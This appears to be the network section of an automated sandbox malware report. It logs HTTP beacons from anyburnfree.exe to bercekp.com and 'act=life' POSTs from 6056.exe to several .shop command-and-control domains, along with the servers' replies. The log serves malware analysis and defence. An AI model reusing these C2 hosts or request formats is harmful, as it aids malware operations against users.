                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    217192.168.2.349996185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:58.303801060 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:58.540627956 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    218192.168.2.349997185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:58.982332945 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:59.219082117 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:59 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    219192.168.2.349998185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:59.591756105 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:59.834808111 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:59 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    220192.168.2.349999185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:12:00.248431921 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:12:00.485017061 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:12:00 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    221192.168.2.350000185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:12:00.951884985 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:12:01.188586950 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:12:01 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    222192.168.2.350001185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:12:01.566592932 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:12:01.803080082 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:12:01 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    223192.168.2.350002185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:12:02.197689056 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:12:02.434504986 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:12:02 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    224192.168.2.350003185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:12:02.891415119 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:12:03.128391981 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:12:03 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.349714172.67.217.1004437620C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-02-08 18:08:46 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: resergvearyinitiani.shop
                                                                                                                                                                    2024-02-08 18:08:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-02-08 18:08:46 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:46 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=m5fo52qf21ms995s6gigb1lisv; expires=Mon, 03-Jun-2024 11:55:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xi5NJUOzBd8BXT%2BrfXUzmIYaLB7forBQfrYRBtXFCIeQcrQAXiLBVzvTGeYVGlBscG1jLNt1v5H4MvOrZHA%2F6evcNEFijlFWNASjomye08610%2B6%2FfIzUuJM3FAMAv5YphQueXSMM0MKlaHc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8525d1e38ccd673c-ATL
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-02-08 18:08:46 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                    2024-02-08 18:08:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.349715104.21.80.1714437620C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-02-08 18:08:47 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: gemcreedarticulateod.shop
                                                                                                                                                                    2024-02-08 18:08:47 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-02-08 18:08:48 UTC808INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:48 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=qdrpv0c1iotvn3mv6dt8j5b46h; expires=Mon, 03-Jun-2024 11:55:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5ucpGf%2BM5Y45gpzNUBmoGkn0KFRvt8byXHAPD29XeGnn45W29vapgnkZboIex1jJdSbQeoFFy%2FgQgW0oYEk9WTTVYHG%2BVg2vamqhq3X3IdZgiKu8sIGjOR8Pj1959v5HvXZKgxGKaowvCibS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8525d1e9afac78cc-ATL
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-02-08 18:08:48 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                    2024-02-08 18:08:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.349719104.21.16.1524437620C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-02-08 18:08:50 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: secretionsuitcasenioise.shop
                                                                                                                                                                    2024-02-08 18:08:50 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-02-08 18:08:51 UTC810INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:51 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=7ifv93299sh48kht4p6afofq32; expires=Mon, 03-Jun-2024 11:55:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fMW5xG2W6upkb3dRAj8Lk3M6ARzh%2Fm1cWZ7Z5HZEYJZzXro64rL4ptq3C4WK3ocqHMkcZlSJavtqVAbgUKL9GRb%2FXeCLUcXm9iGwF2adfn1azb82r6884lVNpAdcpu47P7QaIWyTuylYWXHwtGKV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8525d1fefd91b04a-ATL
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-02-08 18:08:51 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                    2024-02-08 18:08:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.349722104.21.58.314437620C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-02-08 18:08:53 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: claimconcessionrebe.shop
                                                                                                                                                                    2024-02-08 18:08:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-02-08 18:08:53 UTC826INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:53 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=ia4rngsksm5cqlf3jn5cslv7gq; expires=Mon, 03-Jun-2024 11:55:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e%2FZY2Mp9IT0%2Bj88P%2FT%2BRc3HdK%2FXGTOM%2B9izwTVtek%2FooaOw5oQQjhoMaJzPgmxbWYx8kVqbbO5rv5xe1SaQQHfTb6NpHfFF29Mt%2FT75NeUGEheZOkFUnz6%2FQNbLnXm3PF6JO%2F%2BpnuPof9l0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8525d20cceae0703-ATL
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-02-08 18:08:53 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                    2024-02-08 18:08:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.349724104.21.83.2204437620C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-02-08 18:08:54 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: liabilityarrangemenyit.shop
                                                                                                                                                                    2024-02-08 18:08:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-02-08 18:08:54 UTC561INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:54 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3xyDjGUfAn2ddSc3Qd1S1WwoJhLt46Ny5jk9fm8cuxsr4mJq0apAXtP5bA3JDzgyv3SSTzDkKoKeAzKqoUSkf0GceUvaw%2FYQbxWGXEIUGa9B3Hyj1lN6OvwuapA%2BRRnpwBMAXKBhqcxRUftmtmg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8525d213fa2a6776-ATL
                                                                                                                                                                    2024-02-08 18:08:54 UTC808INData Raw: 31 31 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                    Data Ascii: 1123<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                    2024-02-08 18:08:54 UTC1369INData Raw: 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74
                                                                                                                                                                    Data Ascii: gi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElement
                                                                                                                                                                    2024-02-08 18:08:54 UTC1369INData Raw: 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 36 54 79 52 4e 65 31 42 4f 6f 35 30 52 4c 4c 46 4d 62 62 71 50 4e 30 69 54 54 6d 52 34 7a 74 78 68 7a 55 77 7a 4b 68 52 70 78 41 2d 31 37 30 37 34 31 35 37 33 34 2d 30 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 64 64 6f 73 2f 67 6c 6f 73 73 61 72 79 2f 6d 61 6c 77 61 72 65 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                                                                                                                                                                    Data Ascii: text/plain"> <input type="hidden" name="atok" value="6TyRNe1BOo50RLLFMbbqPN0iTTmR4ztxhzUwzKhRpxA-1707415734-0-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-btn" sty
                                                                                                                                                                    2024-02-08 18:08:54 UTC849INData Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61
                                                                                                                                                                    Data Ascii: m:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
